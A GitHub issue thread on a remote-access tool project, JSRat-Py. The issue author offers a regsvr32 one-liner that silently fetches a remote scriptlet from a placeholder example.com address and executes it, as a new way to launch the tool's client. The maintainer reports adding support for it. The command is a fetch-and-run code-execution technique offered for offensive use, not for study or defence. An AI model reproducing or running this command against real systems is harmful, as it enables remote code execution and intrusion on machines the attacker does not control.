### ISSUE TITLE
New Client Invocation

### ISSUE THREAD

**Issue by ghost** [Hood3dRob1n/JSRat-Py#2]
Update for your tool.

This technique can replace the rundll32 command, and already handles proxy settings, etc..

regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll

https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302

**Comment by Hood3dRob1n** [comment]
very cool, will see what i can do this coming week to make some modifications

**Comment by Hood3dRob1n** [comment]
Code updated to handle either client invocation method ;)
